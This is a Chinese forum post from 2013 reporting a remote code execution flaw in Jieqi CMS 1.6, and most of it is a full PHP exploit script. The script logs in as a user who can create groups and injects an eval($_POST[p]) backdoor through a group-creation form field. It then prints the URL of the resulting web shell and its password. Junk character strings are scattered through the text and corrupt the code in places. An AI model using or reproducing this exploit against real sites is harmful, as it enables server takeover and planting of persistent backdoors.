杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。
9 \5 O) w# e0 V# o
0 H2 C. U! ?1 E0 [ q
! X/ {" U' q) L4 {6 r该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。3 W+ F7 E2 S/ S* P0 P5 k
需要有一个能创建圈子的用户。' C1 D$ }! L% P. q# P9 C
8 Q& Y2 ]# g6 l6 c& b
<?php$ J- p9 @0 |! U' R: L& ?4 _
1 O6 g+ G- V% T. h: z. {" S9 E
print_r('
) V! a, K8 o1 d }7 E) L; G h+---------------------------------------------------------------------------+
! d, v4 e& X6 q# s/ ]+ Q) ?Jieqi CMS V1.6 PHP Code Injection Exploit
- F" f& ~+ |1 N/ |5 z$ F2 Nby flyh4t5 I; w8 Z: [/ M. F
mail: phpsec at hotmail dot com
6 ~1 T" }$ k$ @6 J+ ]9 S9 dteam: http://www.wolvez.org
9 O8 Y, w' J8 D; q+---------------------------------------------------------------------------+
$ i, S* Q" O! [. o4 o. C# w/ h'); /**
- ?4 G" j+ q5 ` v" m * works regardless of php.ini settings
, x1 h/ o$ {! s) |! m( l*/ if ($argc < 5) { print_r('
( T& w) d; T' [1 Y* a+---------------------------------------------------------------------------+
4 F0 ~: D0 R2 a# W2 h$ c$ CUsage: php '.$argv[0].' host path username* ~7 W( z) k9 H) \, {: \
host: target server (ip/hostname)
; o; O* w8 p3 q% v* [( Tpath: path to jieqicms
& \% B, A' K1 s0 p! muasename: a username who can create group
9 H& Z5 U5 ~% kExample:: y5 [7 ~9 ]7 p6 o
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password0 A0 e2 y3 b8 u2 K. m1 ^: T
+---------------------------------------------------------------------------+
$ g3 ~5 r; ~7 _% R2 j- _7 t'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------232811682799610 D' w' e; z W8 Y4 V) Q
Content-Disposition: form-data; name="gname"( a* A" k, r$ D$ `: r
8 ?; R7 k8 ?7 G% U: l
'; $params .="';"; $params .='eval($_POST[p]);//flyh4t
. t, l$ r% i; h8 s0 K-----------------------------23281168279961
. l% S4 t0 i% kContent-Disposition: form-data; name="gcatid"
, a2 L/ S5 [9 c8 z' a) D ^9 |4 O c q3 K3 C' J5 `9 A* ~/ @
1
8 s9 ?# r' G7 W-----------------------------23281168279961
$ q! {& A! s- z0 U. q3 o; bContent-Disposition: form-data; name="gaudit"4 @% z A8 M, C9 U& C
/ l8 I3 K& n) F9 E5 q7 ]) N10 _) S' u: s/ q6 X" A
-----------------------------23281168279961+ w0 T1 { {* [6 X. J5 m: U7 b
Content-Disposition: form-data; name="gbrief"
0 f. `6 s- u W( c0 N! W
8 b) D$ I' K: t" k( _1
3 n% z4 c, N5 K2 G7 i8 Q( }# q, P( `, s-----------------------------23281168279961--
) c, a+ G8 h; \, {+ l'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com
; F. E8 _% A6 D' W x) _2 I" Q7 B
* m7 v$ F j+ M* f" b; I- W3 h7 hpreg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |
发表于 2013-2-23 11:28:09
收藏
支持
反对